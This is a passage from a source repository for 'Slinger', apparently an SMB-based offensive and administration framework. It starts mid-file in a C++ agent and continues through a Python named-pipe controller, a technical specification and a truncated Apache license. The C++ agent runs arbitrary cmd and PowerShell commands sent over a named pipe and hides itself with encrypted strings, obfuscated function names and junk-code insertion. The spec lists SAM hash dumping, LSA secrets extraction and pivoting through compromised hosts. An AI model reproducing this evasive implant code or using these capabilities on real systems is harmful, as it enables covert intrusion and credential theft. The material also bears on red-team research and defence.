ERROR_PREFIX.decrypt() + "Failed to execute command"; 131 | } 132 | 133 | // Read output 134 | std::string output; 135 | char buffer[4096]; 136 | DWORD bytes_read; 137 | 138 | while (ReadFile(hRead, buffer, sizeof(buffer) - 1, &bytes_read, NULL) && bytes_read > 0) { 139 | buffer[bytes_read] = '\0'; 140 | output += buffer; 141 | obf::insert_junk_code(); 142 | } 143 | 144 | WaitForSingleObject(pi.hProcess, 30000); // 30 second timeout 145 | CloseHandle(hRead); 146 | CloseHandle(pi.hProcess); 147 | CloseHandle(pi.hThread); 148 | 149 | return output.empty() ? INFO_PREFIX.decrypt() + "Command executed successfully" : output; 150 | #else 151 | // Linux implementation using popen 152 | FILE* pipe = popen(cmd_line.c_str(), "r"); 153 | if (!pipe) { 154 | return ERROR_PREFIX.decrypt() + "Failed to execute command"; 155 | } 156 | 157 | std::string output; 158 | char buffer[4096]; 159 | while (fgets(buffer, sizeof(buffer), pipe) != nullptr) { 160 | output += buffer; 161 | obf::insert_junk_code(); 162 | } 163 | 164 | int exit_code = pclose(pipe); 165 | if (output.empty() && exit_code == 0) { 166 | return INFO_PREFIX.decrypt() + "Command executed successfully"; 167 | } 168 | 169 | return output; 170 | #endif 171 | } 172 | 173 | std::string CommandExecutor::OBF_FUNC_NAME(execute_cmd)(const std::string& command) { 174 | auto cmd_exe = CMD_EXE.decrypt(); 175 | auto cmd_flag = CMD_FLAG.decrypt(); 176 | auto sanitized = OBF_FUNC_NAME(sanitize_command)(command); 177 | 178 | std::string full_command = cmd_exe + " " + cmd_flag + " " + sanitized; 179 | return OBF_FUNC_NAME(execute_with_createprocess)(full_command); 180 | } 181 | 182 | std::string CommandExecutor::OBF_FUNC_NAME(execute_powershell)(const std::string& command) { 183 | auto ps_exe = POWERSHELL_EXE.decrypt(); 184 | auto ps_flags = PS_FLAGS.decrypt(); 185 | auto sanitized = OBF_FUNC_NAME(sanitize_command)(command); 186 | 187 | std::string full_command = ps_exe + " " + ps_flags + " \"" + sanitized + "\""; 188 | return OBF_FUNC_NAME(execute_with_createprocess)(full_command); 189 | } 190 | 191 | std::string CommandExecutor::execute(const std::string& command) { 192 | if (command.empty()) { 193 | return ERROR_PREFIX.decrypt() + "Empty command"; 194 | } 195 | 196 | obf::insert_junk_code(); 197 | 198 | // Check for pwd command (with or without && suffix) 199 | if (command == "pwd" || command.substr(0, 4) == "pwd " || command.substr(0, 7) == "pwd && ") { 200 | return get_current_directory(); 201 | } 202 | 203 | // Check for cd command (bare cd or cd with path) 204 | if (command == "cd" || command == "cd && cd") { 205 | return get_current_directory(); 206 | } 207 | 208 | if (command.substr(0, 3) == "cd ") { 209 | std::string path = command.substr(3); 210 | // Extract path up to && if present (client appends "&& cd" for tracking) 211 | size_t and_pos = path.find("&&"); 212 | if (and_pos != std::string::npos) { 213 | path = path.substr(0, and_pos); 214 | // Trim trailing whitespace 215 | while (!path.empty() && (path.back() == ' ' || path.back() == '\t')) { 216 | path.pop_back(); 217 | } 218 | } 219 | if (change_directory(path)) { 220 | return get_current_directory(); 221 | } else { 222 | return ERROR_PREFIX.decrypt() + "Failed to change directory"; 223 | } 224 | } 225 | 226 | //if (command == "ps" || command == "tasklist") { 227 | // return list_processes(); 228 | //} 229 | 230 | //if (command == "sysinfo" || command == "systeminfo") { 231 | // return get_system_info(); 232 | //} 233 | 234 | // Execute based on command type 235 | if (OBF_FUNC_NAME(is_powershell_command)(command)) { 236 | return OBF_FUNC_NAME(execute_powershell)(command); 237 | } else { 238 | return OBF_FUNC_NAME(execute_cmd)(command); 239 | } 240 | } 241 | 242 | std::string CommandExecutor::get_current_directory() { 243 | char buffer[MAX_PATH]; 244 | 245 | #ifdef _WIN32 246 | DWORD result = GetCurrentDirectoryA(MAX_PATH, buffer); 247 | if (result == 0) { 248 | return ERROR_PREFIX.decrypt() + "Failed to get current directory"; 249 | } 250 | #else 251 | if (getcwd(buffer, MAX_PATH) == nullptr) { 252 | return ERROR_PREFIX.decrypt() + "Failed to get current directory"; 253 | } 254 | #endif 255 | 256 | return INFO_PREFIX.decrypt() + "Current directory: " + std::string(buffer); 257 | } 258 | 259 | bool CommandExecutor::change_directory(const std::string& path) { 260 | obf::insert_junk_code(); 261 | #ifdef _WIN32 262 | return SetCurrentDirectoryA(path.c_str()) != 0; 263 | #else 264 | return chdir(path.c_str()) == 0; 265 | #endif 266 | } 267 | 268 | std::string CommandExecutor::list_processes() { 269 | #ifdef _WIN32 270 | return OBF_FUNC_NAME(execute_cmd)("tasklist /fo csv"); 271 | #else 272 | return OBF_FUNC_NAME(execute_cmd)("ps aux"); 273 | #endif 274 | } 275 | 276 | std::string CommandExecutor::get_system_info() { 277 | std::stringstream info; 278 | 279 | #ifdef _WIN32 280 | // Get computer name 281 | char computer_name[MAX_COMPUTERNAME_LENGTH + 1]; 282 | DWORD size = sizeof(computer_name); 283 | if (GetComputerNameA(computer_name, &size)) { 284 | info << INFO_PREFIX.decrypt() << "Computer: " << computer_name << "\n"; 285 | } 286 | 287 | // Get username 288 | char username[256]; 289 | size = sizeof(username); 290 | if (GetUserNameA(username, &size)) { 291 | info << INFO_PREFIX.decrypt() << "User: " << username << "\n"; 292 | } 293 | 294 | // Get OS version 295 | OSVERSIONINFOA os_info; 296 | os_info.dwOSVersionInfoSize = sizeof(os_info); 297 | if (GetVersionExA(&os_info)) { 298 | info << INFO_PREFIX.decrypt() << "OS Version: " 299 | << os_info.dwMajorVersion << "." 300 | << os_info.dwMinorVersion << "." 301 | << os_info.dwBuildNumber << "\n"; 302 | } 303 | #else 304 | // Linux system info 305 | char hostname[256]; 306 | if (gethostname(hostname, sizeof(hostname)) == 0) { 307 | info << INFO_PREFIX.decrypt() << "Hostname: " << hostname << "\n"; 308 | } 309 | 310 | char* username = getenv("USER"); 311 | if (username) { 312 | info << INFO_PREFIX.decrypt() << "User: " << username << "\n"; 313 | } 314 | 315 | // Get OS info from uname 316 | info << OBF_FUNC_NAME(execute_cmd)("uname -a") << "\n"; 317 | #endif 318 | 319 | // Get current directory 320 | info << get_current_directory() << "\n"; 321 | 322 | return info.str(); 323 | } 324 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/named_pipe_client.py: -------------------------------------------------------------------------------- 1 | """ 2 | Named Pipe Client Implementation for Agent Communication 3 | Supports both pywin32 and ctypes for cross-platform compatibility 4 | """ 5 | 6 | import struct 7 | import time 8 | from abc import ABC, abstractmethod 9 | 10 | 11 | class NamedPipeClientBase(ABC): 12 | """Base class for named pipe clients""" 13 | 14 | def __init__(self, pipe_path, timeout): 15 | self.pipe_path = pipe_path 16 | self.timeout = timeout 17 | self.connected = False 18 | 19 | @abstractmethod 20 | def connect(self): 21 | """Connect to the named pipe""" 22 | pass 23 | 24 | @abstractmethod 25 | def disconnect(self): 26 | """Disconnect from the named pipe""" 27 | pass 28 | 29 | @abstractmethod 30 | def send_raw(self, data): 31 | """Send raw bytes to the pipe""" 32 | pass 33 | 34 | @abstractmethod 35 | def receive_raw(self, size): 36 | """Receive raw bytes from the pipe""" 37 | pass 38 | 39 | def send_message(self, message_type, data): 40 | """Send a structured message to the agent""" 41 | try: 42 | # Message format: [length:4][type:4][data:N] 43 | data_bytes = data.encode("utf-8") if isinstance(data, str) else data 44 | length = len(data_bytes) 45 | 46 | header = struct.pack(" 0: 67 | data = self.receive_raw(length) 68 | if not data or len(data) != length: 69 | return None, None 70 | return msg_type, data.decode("utf-8", errors="ignore") 71 | else: 72 | return msg_type, "" 73 | 74 | except Exception as e: 75 | print(f"Failed to receive message: {e}") 76 | return None, None 77 | 78 | def send_handshake(self): 79 | """Send handshake to agent""" 80 | return self.send_message(0x1003, "SLINGER_READY") # HANDSHAKE type 81 | 82 | def send_command(self, command): 83 | """Send command to agent""" 84 | return self.send_message(0x1001, command) # COMMAND type 85 | 86 | def receive_response(self): 87 | """Receive response from agent""" 88 | msg_type, data = self.receive_message() 89 | if msg_type == 0x1002: # RESPONSE type 90 | return data 91 | return None 92 | 93 | 94 | class NamedPipeClientWin32(NamedPipeClientBase): 95 | """Named pipe client using pywin32""" 96 | 97 | def __init__(self, pipe_path, timeout): 98 | super().__init__(pipe_path, timeout) 99 | self.handle = None 100 | 101 | def connect(self): 102 | """Connect using pywin32""" 103 | try: 104 | import win32pipe 105 | import win32file 106 | import pywintypes 107 | 108 | # Wait for pipe to be available 109 | start_time = time.time() 110 | while time.time() - start_time < self.timeout: 111 | try: 112 | win32pipe.WaitNamedPipe(self.pipe_path, int(self.timeout * 1000)) 113 | break 114 | except pywintypes.error: 115 | time.sleep(0.1) 116 | continue 117 | else: 118 | return False 119 | 120 | # Open the pipe 121 | self.handle = win32file.CreateFile( 122 | self.pipe_path, 123 | win32file.GENERIC_READ | win32file.GENERIC_WRITE, 124 | 0, 125 | None, 126 | win32file.OPEN_EXISTING, 127 | 0, 128 | None, 129 | ) 130 | 131 | if self.handle == win32file.INVALID_HANDLE_VALUE: 132 | return False 133 | 134 | self.connected = True 135 | return True 136 | 137 | except Exception as e: 138 | print(f"Win32 pipe connection failed: {e}") 139 | return False 140 | 141 | def disconnect(self): 142 | """Disconnect using pywin32""" 143 | try: 144 | if self.handle: 145 | import win32file 146 | 147 | win32file.CloseHandle(self.handle) 148 | self.handle = None 149 | self.connected = False 150 | except: 151 | pass 152 | 153 | def send_raw(self, data): 154 | """Send raw data using pywin32""" 155 | try: 156 | if not self.connected or not self.handle: 157 | return False 158 | 159 | import win32file 160 | 161 | bytes_written = 0 162 | total_bytes = len(data) 163 | 164 | while bytes_written < total_bytes: 165 | result, written = win32file.WriteFile(self.handle, data[bytes_written:]) 166 | if result != 0: 167 | return False 168 | bytes_written += written 169 | 170 | return True 171 | 172 | except Exception as e: 173 | print(f"Win32 send failed: {e}") 174 | return False 175 | 176 | def receive_raw(self, size): 177 | """Receive raw data using pywin32""" 178 | try: 179 | if not self.connected or not self.handle: 180 | return None 181 | 182 | import win32file 183 | 184 | result, data = win32file.ReadFile(self.handle, size) 185 | if result == 0: 186 | return data 187 | return None 188 | 189 | except Exception as e: 190 | print(f"Win32 receive failed: {e}") 191 | return None 192 | 193 | 194 | class NamedPipeClientCtypes(NamedPipeClientBase): 195 | """Named pipe client using ctypes (cross-platform)""" 196 | 197 | def __init__(self, pipe_path, timeout): 198 | super().__init__(pipe_path, timeout) 199 | self.handle = None 200 | self._setup_ctypes() 201 | 202 | def _setup_ctypes(self): 203 | """Setup ctypes for Windows API calls""" 204 | try: 205 | import ctypes 206 | from ctypes import wintypes 207 | 208 | self.kernel32 = ctypes.windll.kernel32 209 | 210 | # Define Windows constants 211 | self.GENERIC_READ = 0x80000000 212 | self.GENERIC_WRITE = 0x40000000 213 | self.OPEN_EXISTING = 3 214 | self.INVALID_HANDLE_VALUE = -1 215 | 216 | # Setup function prototypes 217 | self.kernel32.CreateFileW.argtypes = [ 218 | wintypes.LPCWSTR, 219 | wintypes.DWORD, 220 | wintypes.DWORD, 221 | ctypes.c_void_p, 222 | wintypes.DWORD, 223 | wintypes.DWORD, 224 | wintypes.HANDLE, 225 | ] 226 | self.kernel32.CreateFileW.restype = wintypes.HANDLE 227 | 228 | self.kernel32.WriteFile.argtypes = [ 229 | wintypes.HANDLE, 230 | ctypes.c_void_p, 231 | wintypes.DWORD, 232 | ctypes.POINTER(wintypes.DWORD), 233 | ctypes.c_void_p, 234 | ] 235 | self.kernel32.WriteFile.restype = wintypes.BOOL 236 | 237 | self.kernel32.ReadFile.argtypes = [ 238 | wintypes.HANDLE, 239 | ctypes.c_void_p, 240 | wintypes.DWORD, 241 | ctypes.POINTER(wintypes.DWORD), 242 | ctypes.c_void_p, 243 | ] 244 | self.kernel32.ReadFile.restype = wintypes.BOOL 245 | 246 | except Exception as e: 247 | print(f"Failed to setup ctypes: {e}") 248 | raise 249 | 250 | def connect(self): 251 | """Connect using ctypes""" 252 | try: 253 | import ctypes 254 | 255 | # Try to open the pipe 256 | start_time = time.time() 257 | while time.time() - start_time < self.timeout: 258 | self.handle = self.kernel32.CreateFileW( 259 | self.pipe_path, 260 | self.GENERIC_READ | self.GENERIC_WRITE, 261 | 0, 262 | None, 263 | self.OPEN_EXISTING, 264 | 0, 265 | None, 266 | ) 267 | 268 | if self.handle != self.INVALID_HANDLE_VALUE: 269 | self.connected = True 270 | return True 271 | 272 | time.sleep(0.1) 273 | 274 | return False 275 | 276 | except Exception as e: 277 | print(f"Ctypes pipe connection failed: {e}") 278 | return False 279 | 280 | def disconnect(self): 281 | """Disconnect using ctypes""" 282 | try: 283 | if self.handle and self.handle != self.INVALID_HANDLE_VALUE: 284 | self.kernel32.CloseHandle(self.handle) 285 | self.handle = None 286 | self.connected = False 287 | except: 288 | pass 289 | 290 | def send_raw(self, data): 291 | """Send raw data using ctypes""" 292 | try: 293 | if not self.connected or not self.handle: 294 | return False 295 | 296 | import ctypes 297 | from ctypes import wintypes 298 | 299 | bytes_written = wintypes.DWORD(0) 300 | result = self.kernel32.WriteFile( 301 | self.handle, ctypes.c_char_p(data), len(data), ctypes.byref(bytes_written), None 302 | ) 303 | 304 | return result and bytes_written.value == len(data) 305 | 306 | except Exception as e: 307 | print(f"Ctypes send failed: {e}") 308 | return False 309 | 310 | def receive_raw(self, size): 311 | """Receive raw data using ctypes""" 312 | try: 313 | if not self.connected or not self.handle: 314 | return None 315 | 316 | import ctypes 317 | from ctypes import wintypes 318 | 319 | buffer = ctypes.create_string_buffer(size) 320 | bytes_read = wintypes.DWORD(0) 321 | 322 | result = self.kernel32.ReadFile( 323 | self.handle, buffer, size, ctypes.byref(bytes_read), None 324 | ) 325 | 326 | if result: 327 | return buffer.raw[: bytes_read.value] 328 | return None 329 | 330 | except Exception as e: 331 | print(f"Ctypes receive failed: {e}") 332 | return None 333 | -------------------------------------------------------------------------------- /docs/TECHNICAL_SPEC.md: -------------------------------------------------------------------------------- 1 | # Technical Specification 2 | 3 | ## Project Overview 4 | 5 | Slinger is a comprehensive SMB (Server Message Block) client framework designed for security professionals and system administrators. Built on the Impacket library, it provides an interactive command-line interface for advanced Windows system administration and security testing operations over SMB/CIFS protocols. 6 | 7 | ### Core Architecture 8 | 9 | The project follows a modular, plugin-based architecture with these key components: 10 | 11 | 1. **Interactive CLI Layer** (`slinger.py`): Main entry point providing persistent interactive session with command history, auto-completion, and context awareness 12 | 2. **SMB Protocol Layer** (`smblib.py`): Core SMB operations including file transfers, directory navigation, and share management 13 | 3. **Windows Administration Layer** (`slingerclient.py`): High-level wrappers for Windows-specific operations (services, tasks, registry, processes) 14 | 4. **Plugin System**: Extensible architecture allowing custom functionality modules 15 | 5. **Utility Framework** (`utils/`): Supporting modules for CLI parsing, output formatting, configuration management, and logging 16 | 17 | ### Operational Flow 18 | 19 | 1. **Connection Establishment**: Authenticates to target Windows system using NTLM, Kerberos, or password-based authentication 20 | 2. **Share Enumeration**: Discovers and connects to available SMB shares (C$, Admin$, custom shares) 21 | 3. **Interactive Operations**: Provides shell-like interface for file operations, system administration, and reconnaissance 22 | 4. **Context Management**: Maintains current working directory, connection state, and session history 23 | 5. **Plugin Integration**: Dynamically loads additional functionality modules for specialized operations 24 | 25 | ### Key Capabilities 26 | 27 | **File System Operations:** 28 | - Bi-directional file transfers with resume capability 29 | - Recursive directory operations with depth control 30 | - Advanced path resolution and normalization 31 | - Output redirection and command result archiving 32 | 33 | **Windows System Administration:** 34 | - Service management (start/stop/create/delete/enumerate) 35 | - Scheduled task management with XML template support 36 | - Registry operations (read/write/delete keys and values) 37 | - Process enumeration and management 38 | - Network configuration and interface discovery 39 | 40 | **Security Operations:** 41 | - Hash dumping (SAM, SYSTEM, SECURITY hives) 42 | - Secrets extraction (LSA secrets, cached credentials) 43 | - User session enumeration 44 | - Firewall rule analysis 45 | - Remote command execution via task scheduling 46 | 47 | **Advanced Features:** 48 | - Port forwarding through compromised systems 49 | - Performance counter monitoring 50 | - Event log access and analysis 51 | - WMI query capabilities 52 | - Plugin-based extensibility 53 | 54 | ## Core Functions and Classes 55 | 56 | ### Main Entry Point (slinger.py) 57 | 58 | #### `main()` 59 | - **Purpose**: Main application entry point 60 | - **Parameters**: None (uses sys.argv) 61 | - **Returns**: None 62 | - **Description**: Handles argument parsing, authentication, SMB connection establishment, and main command loop 63 | 64 | #### `create_ntlm_hash(password)` 65 | - **Purpose**: Generate NTLM hash from plaintext password 66 | - **Parameters**: 67 | - `password` (str): Plaintext password 68 | - **Returns**: str - NTLM hash or None on failure 69 | - **Description**: Uses passlib to create NTLM hash for authentication 70 | 71 | ### SMB Library (smblib.py) 72 | 73 | #### File Operations 74 | 75 | ##### `upload_handler(args)` 76 | - **Purpose**: Handle file upload command with path validation 77 | - **Parameters**: 78 | - `args`: Parsed arguments containing local_path and remote_path 79 | - **Returns**: None 80 | - **Description**: Validates paths, shows verbose output, calls upload() 81 | 82 | ##### `upload(local_path, remote_path)` 83 | - **Purpose**: Core file upload functionality 84 | - **Parameters**: 85 | - `local_path` (str): Local file path to upload 86 | - `remote_path` (str): Remote destination path 87 | - **Returns**: None 88 | - **Description**: Performs actual SMB file upload using conn.putFile() 89 | 90 | ##### `download_handler(args, echo=True)` 91 | - **Purpose**: Handle file download command with path validation 92 | - **Parameters**: 93 | - `args`: Parsed arguments containing remote_path and local_path 94 | - `echo` (bool): Whether to show progress messages 95 | - **Returns**: None 96 | - **Description**: Validates paths, determines local filename (supports custom filenames), calls download() 97 | - **Enhancement**: Now supports custom filenames via syntax: `get remote_file.txt /path/to/custom_name.txt` 98 | 99 | ##### `download(remote_path, local_path, echo=True)` 100 | - **Purpose**: Core file download functionality 101 | - **Parameters**: 102 | - `remote_path` (str): Remote file path to download 103 | - `local_path` (str): Local destination path 104 | - `echo` (bool): Whether to show progress messages 105 | - **Returns**: None 106 | - **Description**: Performs actual SMB file download using conn.getFile() 107 | 108 | #### Directory Operations 109 | 110 | ##### `ls(args=None)` 111 | - **Purpose**: List directory contents with various options 112 | - **Parameters**: 113 | - `args`: Parsed arguments with path, sort, recursive, output options 114 | - **Returns**: None 115 | - **Description**: Lists files/directories, supports recursive listing, output to file 116 | 117 | ##### `cd(path)` 118 | - **Purpose**: Change current directory 119 | - **Parameters**: 120 | - `path` (str): Target directory path 121 | - **Returns**: None 122 | - **Description**: Validates and changes current working directory 123 | 124 | ##### `connect_share(args)` 125 | - **Purpose**: Connect to a specific SMB share 126 | - **Parameters**: 127 | - `args`: Parsed arguments containing share name 128 | - **Returns**: None 129 | - **Description**: Establishes connection to specified share 130 | 131 | ##### `find_handler(args)` 132 | - **Purpose**: Handle file search command with pattern matching and filtering 133 | - **Parameters**: 134 | - `args`: Parsed arguments containing pattern, type, size, depth, timeout, and progress options 135 | - **Returns**: None 136 | - **Description**: Searches for files/directories matching specified criteria 137 | - **Features**: 138 | - Pattern matching with wildcards and regex support 139 | - File type filtering (-type f/d) 140 | - Size filtering with operators (+100MB, -1KB, =500B) 141 | - Depth control (--maxdepth, --mindepth) 142 | - Configurable timeout protection (-timeout with 120s default) 143 | - Verbose progress reporting (-progress) 144 | - Result limiting (--limit) 145 | - Multiple output formats (table, json, list, paths) 146 | 147 | ##### `_find_files(pattern, search_path, timeout=120, ...)` 148 | - **Purpose**: Core file search implementation with recursive directory traversal 149 | - **Parameters**: 150 | - `pattern` (str): Search pattern (wildcard or regex) 151 | - `search_path` (str): Starting directory for search 152 | - `timeout` (int): Search timeout in seconds (configurable via CLI) 153 | - Various filtering options (file_type, size_filter, depth limits, etc.) 154 | - **Returns**: List of dictionaries containing file information 155 | - **Description**: Performs recursive file system traversal with timeout protection 156 | - **Enhancements**: 157 | - Configurable timeout via `-timeout` flag (default: 120 seconds) 158 | - Single timeout warning message to prevent duplicates 159 | - Verbose progress output showing directory-by-directory traversal 160 | - Timeout protection with shared warning flag across recursive calls 161 | 162 | #### Path Validation 163 | 164 | ##### `_validate_path_security(current_path, target_path)` 165 | - **Purpose**: Validate and normalize paths for security 166 | - **Parameters**: 167 | - `current_path` (str): Current working directory 168 | - `target_path` (str): User-provided target path 169 | - **Returns**: tuple (bool, str, str) - (is_valid, resolved_path, warning_message) 170 | - **Description**: Prevents directory traversal attacks, normalizes paths 171 | 172 | ##### `_resolve_remote_path(user_path, default_name=None)` 173 | - **Purpose**: Resolve user-provided paths for remote operations 174 | - **Parameters**: 175 | - `user_path` (str): User-provided path 176 | - `default_name` (str): Default filename if path is empty 177 | - **Returns**: tuple (bool, str, str) - (success, resolved_path, error_message) 178 | - **Description**: Handles relative/absolute paths securely 179 | - **Enhancement**: Fixed relative path handling for "../" in upload operations 180 | 181 | ### CLI System (cli.py) 182 | 183 | #### `setup_cli_parser(slingerClient)` 184 | - **Purpose**: Configure argparse-based command system 185 | - **Parameters**: 186 | - `slingerClient`: SMB client instance for command routing 187 | - **Returns**: ArgumentParser - Configured parser with all commands 188 | - **Description**: Sets up all available commands with their arguments and handlers 189 | 190 | #### `print_all_commands(parser)` 191 | - **Purpose**: Display available commands in formatted columns 192 | - **Parameters**: 193 | - `parser`: ArgumentParser instance 194 | - **Returns**: None 195 | - **Description**: Shows user all available commands in 4-column format 196 | 197 | #### `force_help(parser, command)` 198 | - **Purpose**: Show help for specific command 199 | - **Parameters**: 200 | - `parser`: ArgumentParser instance 201 | - `command` (str): Command name to show help for 202 | - **Returns**: None 203 | - **Description**: Displays detailed help for individual commands 204 | 205 | ### Utility Functions (printlib.py) 206 | 207 | #### `print_verbose(msg)` 208 | - **Purpose**: Display verbose messages when verbose mode is enabled 209 | - **Parameters**: 210 | - `msg` (str): Message to display 211 | - **Returns**: None 212 | - **Description**: Checks verbose config setting and prints with [*] prefix 213 | 214 | #### `print_good(msg)`, `print_bad(msg)`, `print_warning(msg)`, `print_info(msg)` 215 | - **Purpose**: Colored output functions for different message types 216 | - **Parameters**: 217 | - `msg` (str): Message to display 218 | - **Returns**: None 219 | - **Description**: Provides consistent colored output with appropriate prefixes 220 | 221 | ### Configuration System (config.py) 222 | 223 | #### Configuration Variables 224 | - **Debug**: Enable debug messages (bool) 225 | - **Verbose**: Enable verbose output (bool) 226 | - **Logs_Folder**: Directory for log files (str) 227 | - **History_File**: Command history file location (str) 228 | - **Plugin_Folders**: Directories to search for plugins (list) 229 | - **Codec**: Text encoding for output (str) 230 | 231 | ### Output Redirection (common.py) 232 | 233 | #### `tee_output(filename)` 234 | - **Purpose**: Context manager for redirecting output to file and console 235 | - **Parameters**: 236 | - `filename` (str): Output file path 237 | - **Returns**: Context manager 238 | - **Description**: Allows saving command output to file while still showing on console 239 | 240 | #### `TeeOutput` class 241 | - **Purpose**: Output redirection implementation 242 | - **Methods**: 243 | - `write(data)`: Write to both console and file 244 | - `flush()`: Flush both outputs 245 | - `close()`: Close file handle 246 | - **Description**: Core implementation for output redirection functionality 247 | 248 | ## Plugin Architecture 249 | 250 | ### Plugin Loading 251 | - Plugins are loaded from configured directories 252 | - Each plugin must inherit from base plugin class 253 | - Plugins can add new commands to the CLI system 254 | - Plugin parsers are merged with main argument parser 255 | 256 | ### Plugin Integration 257 | - Plugins register their own command handlers 258 | - Commands are dynamically added to the main CLI 259 | - Plugin state is maintained throughout session 260 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | 